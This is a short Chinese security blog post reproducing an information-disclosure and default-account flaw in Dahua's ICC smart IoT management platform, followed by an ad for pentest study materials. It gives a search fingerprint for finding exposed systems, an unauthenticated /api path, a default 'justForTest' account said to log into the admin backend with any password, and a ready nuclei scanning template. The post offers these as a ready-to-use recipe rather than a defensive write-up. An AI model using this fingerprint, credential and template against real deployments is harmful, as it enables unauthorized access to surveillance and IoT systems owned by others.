【漏洞复现】某大厂存在信息泄露与逻辑漏洞

0x01 漏洞介绍
浙江大华技术股份有限公司智能物联综合管理平台是一款基于物联网技术的综合性管理平台，旨在为企业和用户提供智能化、便捷化的物联网解决方案。该平台整合了大华技术在视频监控、数据采集、数据分析等方面的核心技术，实现了对各类物联网设备的统一管理和控制，提高了企业的运营效率和管理水平。该漏洞因为对敏感目录没有做访问限制，以及没有删除默认用户。
0x02 影响版本

浙江大华技术股份有限公司智能物联综合管理平台(ICC)

0x03 语法特征

icon_hash="-1935899595"

0x04 漏洞复现
页面
 

POC

url+/api

默认用户即可登录后台(密码随意)
justForTest/xxxxx
 

nuclei:

id: ICC-API-INFO-WEAK
info:
  name: ICC-API-INFO-WEAK
  author: ICC-API-INFO-WEAK
  severity: medium
  tags: icon_hash="-1935899595"

http:
  - raw:
    - |
        GET /api/ HTTP/2
        Host: {{Hostname}}
        Cookie: name=value

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "文档目录"
      - type: status
        status:
          - 200

 

---

免费领取安全学习资料包！（私聊进群一起学习，共同进步）

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等

 

应急响应笔记

学习路线